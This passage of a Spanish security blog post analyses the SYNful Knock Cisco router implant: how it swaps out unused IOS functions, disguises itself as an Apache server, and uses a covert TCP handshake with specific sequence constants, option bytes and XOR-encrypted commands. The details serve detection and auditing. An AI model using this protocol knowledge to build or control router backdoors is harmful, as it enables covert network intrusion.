Uno de los factores que tuvieron cuidado de diseñar los autores fue el tamaño característico de la imagen binaria de Cisco IOS. ¿Cómo meter nueva funcionalidad sin engordar el tamaño del firmware? ¿Dieta milagro? No. Básicamente borrando funciones que no eran usadas por el dispositivo objetivo y sustituyéndolas por la funcionalidad maliciosa. Incluso se llegan a borrar algunas cadenas de caracteres de información de IOS por cadenas usadas para el servidor malicioso en HTTP. Algo que, absurdamente, identifica un router como infectado debido a que responde como un servidor Apache sobre un sistema GNU/Linux, pero que hace que el puerto 80 no destaque en escaneos arbitrarios al pasar por un servidor. Es decir, si sospechas de tus routers y escaneas el puerto 80 en busca de cabeceras te das cuenta, pero durante un escaneo rutinario puede pasar por debajo del radar.


Apretones de manos con guantes blancos

La comunicación entre el centro de control y sus tropas desplegadas es digna de detalle.

El router afectado mantiene a la escucha los puertos asociados a su administración. El preámbulo se efectúa con un paquete TCP SYN dirigido al puerto 80 con una constante entre el número de secuencia y el número reconocimiento ("acknowledgment"): 0xC123D.

El SYN-ACK del router responderá con un número diferencial secuencial del anterior: 0xC123E. Los siguientes bytes en las opciones TCP del paquete: "02 04 05 b4 01 01 04 02 01 03 03 05", el puntero URGENT a 0x0001, pero no su bandera correspondiente. También reutilizará el número de reconocimiento del paquete SYN como número de secuencia de su SYN-ACK, número que generalmente es pseudoaleatorio en implementaciones comunes de pila TCP.

Tras el ACK, el centro de control enviará un paquete con las banderas PUSH y ACK activadas, a partir del offset 0x62 la cadena "text" y a 0x67 el comando enviado al router, cifrado trivialmente con XOR. 

Este jaleo de intercambios heréticos se inspira en la técnica del port-knocking, secuencias de paquetes modificados para abrir un puerto en un cortafuegos, grosso modo. 


Fin de la fiesta

Todas estas características crean una firma perfecta para alimentar los IPS/IDS y determinar si ciertos routers se hayan afectados. El propio equipo de FireEye ya nos provee de herramientas para su detección (interesante también para auditorías, ejem, ejem)
Cisco Router 1841

De entre el grupo de dispositivos afectados sobresalen los siguientes modelos de Cisco:

Cisco Router 1841, 2811 y 3825.

No existe correlación entre la distribución geográfica o una organización determinada, aunque de momento Estados Unidos, Líbano o Rusia son los países que más positivos detectados acumulan, el número es pequeño para sacar conclusiones. Ver el estudio de los autores del escáner ZMap para más información.

Cisco ya venía sospechando de este tipo de esquema de ataque. No en vano el 11 de agosto pasado publicó una entrada en su blog bastante reveladora sobre instalación de firmwares maliciosos.


El maldito abracadabra

"…El castillo se desgranaba ante nuestros ojos. A pedazos. Piedra a piedra. De nada sirvieron sus robustos muros, su abismal foso ni las orgullosas torres que rozaban el mismo cielo. Una sola palabra bastó para que el eco de las montañas devolviera el grito desnudo de un viejo gruñón en una fuerza imperturbable, demoledora. Lo que siglos enteros llevó construir a los hombres iba a ser reducido al polvo, apartado a una amarillenta página de una historia que nadie recordará mañana…en cuestión de minutos..."

Resumiendo sin tanta prosa: Cambia las contraseñas por defecto y olvídate del perro cuando elijas una.

Más información:

Malicious Cisco router backdoor found on 79 more devices, 25 in the US

SYNful Knock - A Cisco router implant - Part II

SYNful Knock - A Cisco router implant - Part I
In Search of SYNful Routers

Evolution in Attacks Against Cisco IOS Software Platforms






David García
Twitter: @dgn1729